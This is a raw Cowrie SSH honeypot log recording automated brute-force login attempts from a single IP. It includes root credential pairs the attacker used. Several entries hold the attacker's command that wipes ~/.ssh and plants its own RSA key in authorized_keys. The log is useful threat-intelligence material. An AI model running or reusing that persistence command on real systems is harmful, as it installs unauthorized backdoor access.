{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:03:57.849931Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:03:57.850628Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54956,"dst_ip":"1.2.3.4","dst_port":22,"session":"857a6f06fefc","protocol":"ssh","message":"New connection: 212.227.235.229:54956 (1.2.3.4:22) [session: 857a6f06fefc]","sensor":"my-vps","timestamp":"2025-09-08T23:03:58.045183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:58.045954Z","src_ip":"212.227.235.229","session":"857a6f06fefc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:03:58.106372Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:58.107573Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52490,"dst_ip":"1.2.3.4","dst_port":22,"session":"4df7aa4686bf","protocol":"ssh","message":"New connection: 212.227.235.229:52490 (1.2.3.4:22) [session: 4df7aa4686bf]","sensor":"my-vps","timestamp":"2025-09-08T23:03:58.344203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:58.344843Z","src_ip":"212.227.235.229","session":"4df7aa4686bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:58.373838Z","src_ip":"212.227.235.229","session":"857a6f06fefc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:59.553705Z","src_ip":"212.227.235.229","session":"4df7aa4686bf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:03:59.721767Z","src_ip":"212.227.235.229","session":"857a6f06fefc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:04:00.295188Z","src_ip":"212.227.235.229","session":"4df7aa4686bf"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:01.050851Z","src_ip":"212.227.235.229","session":"857a6f06fefc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56220,"dst_ip":"1.2.3.4","dst_port":22,"session":"c909dfc68884","protocol":"ssh","message":"New connection: 212.227.235.229:56220 (1.2.3.4:22) [session: c909dfc68884]","sensor":"my-vps","timestamp":"2025-09-08T23:04:01.376019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:01.377454Z","src_ip":"212.227.235.229","session":"c909dfc68884"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:01.544051Z","src_ip":"212.227.235.229","session":"4df7aa4686bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:01.703885Z","src_ip":"212.227.235.229","session":"c909dfc68884"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52496,"dst_ip":"1.2.3.4","dst_port":22,"session":"792f43b65e99","protocol":"ssh","message":"New connection: 212.227.235.229:52496 (1.2.3.4:22) [session: 792f43b65e99]","sensor":"my-vps","timestamp":"2025-09-08T23:04:01.798929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:01.800023Z","src_ip":"212.227.235.229","session":"792f43b65e99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:02.052371Z","src_ip":"212.227.235.229","session":"792f43b65e99"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:04:03.052000Z","src_ip":"212.227.235.229","session":"c909dfc68884"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:03.380007Z","src_ip":"212.227.235.229","session":"c909dfc68884"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:03.388826Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:04:03.695146Z","src_ip":"212.227.235.229","session":"792f43b65e99"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:03.948745Z","src_ip":"212.227.235.229","session":"792f43b65e99"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:03.953055Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34578,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d03ac4032c0","protocol":"ssh","message":"New connection: 212.227.235.229:34578 (1.2.3.4:22) [session: 6d03ac4032c0]","sensor":"my-vps","timestamp":"2025-09-08T23:04:09.876791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:09.877825Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:10.109223Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rt123@","message":"login attempt [root/p@ssw0rt123@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:04:11.081117Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:04:11.556686Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:04:11.557334Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:04:11.558341Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:11.790107Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:04:12.375065Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:04:12.375736Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:04:12.608428Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:12.609309Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34582,"dst_ip":"1.2.3.4","dst_port":22,"session":"8420aa76c13b","protocol":"ssh","message":"New connection: 212.227.235.229:34582 (1.2.3.4:22) [session: 8420aa76c13b]","sensor":"my-vps","timestamp":"2025-09-08T23:04:12.845031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:12.845965Z","src_ip":"212.227.235.229","session":"8420aa76c13b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:13.079486Z","src_ip":"212.227.235.229","session":"8420aa76c13b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:04:14.065565Z","src_ip":"212.227.235.229","session":"8420aa76c13b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:15.302773Z","src_ip":"212.227.235.229","session":"8420aa76c13b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34586,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9fe25c77daf","protocol":"ssh","message":"New connection: 212.227.235.229:34586 (1.2.3.4:22) [session: b9fe25c77daf]","sensor":"my-vps","timestamp":"2025-09-08T23:04:15.535134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:15.535951Z","src_ip":"212.227.235.229","session":"b9fe25c77daf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:15.781054Z","src_ip":"212.227.235.229","session":"b9fe25c77daf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:04:16.778347Z","src_ip":"212.227.235.229","session":"b9fe25c77daf"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:17.017897Z","src_ip":"212.227.235.229","session":"b9fe25c77daf"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:17.018826Z","src_ip":"212.227.235.229","session":"6d03ac4032c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52360,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f9232d0db31","protocol":"ssh","message":"New connection: 212.227.235.229:52360 (1.2.3.4:22) [session: 8f9232d0db31]","sensor":"my-vps","timestamp":"2025-09-08T23:04:17.354321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:17.355549Z","src_ip":"212.227.235.229","session":"8f9232d0db31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-n